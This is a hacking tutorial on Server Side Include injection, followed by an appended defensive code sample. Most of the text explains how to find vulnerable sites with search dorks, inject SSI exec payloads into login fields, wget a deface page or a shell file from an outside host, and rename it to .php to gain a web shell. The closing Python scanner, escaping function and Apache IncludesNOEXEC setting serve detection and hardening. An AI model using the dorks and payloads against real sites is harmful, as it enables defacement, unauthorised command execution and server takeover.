Server Side Include (SSI) injection is a web application exploit which grants us access to upload files remotely to vulnerable sites. File uploading accepts multiple extensions; the exception is .php, so you cannot execute your shell in .php form.
- The first step is finding a vulnerable site with Google/Bing dorks:
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
If the dorks don't work, then find the sites manually with the following codes:
- Manual injection: put the following codes in the USERNAME and PASSWORD fields.
- <!--#echo var="DATE_LOCAL" --> IT WILL SHOW DATE
- <!--#exec cmd="whoami"--> IT WILL SHOW RUNNING USER ON THE SERVER
- <pre><!--#exec cmd="ls -a" --></pre> IN LINUX ONLY, IT WILL SHOW DIRECTORY FILES
- <!-- #exec cmd="dir" --> WINDOWS ONLY, DISPLAY DIRECTORY FILES
- After finding a vulnerable loophole in the site, it's time to upload your deface page or shell.
- First find a host provider where you can upload your deface page; the best one is pastehtml.com.
- Now enter the following code in USERNAME and PASSWORD:
<!--#exec cmd="wget http://website.com/deface.html" -->
- With this code your deface page will be uploaded. To view your deface page, go to http://website.com/deface.html
How to upload a shell to the site:
- First host your shell in .txt format on any site.
- Then enter the following code in the login page:
<!--#exec cmd="wget http://website.com/shell.txt" -->
- Check whether your shell.txt is uploaded or not with this code:
<pre><!--#exec cmd="ls -a" --></pre>
- Change the file extension of your shell.txt to shell.php with the help of this command:
<!--#exec cmd="mv abc.txt abc.php" -->
- Now you can access your shell at this link: site.com/shell.php
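Seen from the server side, every step above depends on a form field value being written unescaped into a page that the server parses for SSI. The following is an added example, not part of the original post: it flags SSI directives in submitted field values and shows the output escaping that stops them from being parsed. The function names and the sample submissions are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# SSI directive shape used on this page: <!--#name attr="value" -->
# (whitespace before '#' is tolerated, as in the page's "dir" variant).
SSI_RE = re.compile(r'<!--\s*#\s*([a-z]+)\b(.*?)-->', re.I | re.S)
HIGH = {"exec", "include"}  # directives that run commands or pull in files

def decode(value, rounds=3):
    """URL-decode until stable so encoded form data is normalised before matching."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value

def find_ssi(value):
    """Return [(directive, severity, raw_match)] for each SSI directive in a field value."""
    hits = []
    for m in SSI_RE.finditer(decode(value)):
        name = m.group(1).lower()
        hits.append((name, "high" if name in HIGH else "medium", m.group(0)))
    return hits

def escape_for_shtml(value):
    """Encode user input before it is written into a page the server parses for SSI."""
    return value.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")

# Constructed sample login submissions (field name -> raw value as received).
SAMPLES = [
    {"username": "alice", "password": "correct horse"},
    {"username": "%3C!--%23echo+var%3D%22DATE_LOCAL%22+--%3E", "password": "x"},
    {"username": "bob", "password": '<!--#exec cmd="whoami"-->'},
]

def scan(samples):
    """Return (sample index, field, directive, severity) for every finding."""
    return [(i, field, d, sev) for i, rec in enumerate(samples)
            for field, v in rec.items() for d, sev, _ in find_ssi(v)]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
    print(escape_for_shtml('<!--#exec cmd="whoami"-->'))
```

On Apache, `Options IncludesNOEXEC` keeps SSI available while disabling the `exec` directive, which removes the command-execution steps shown above even if a directive does reach the parser.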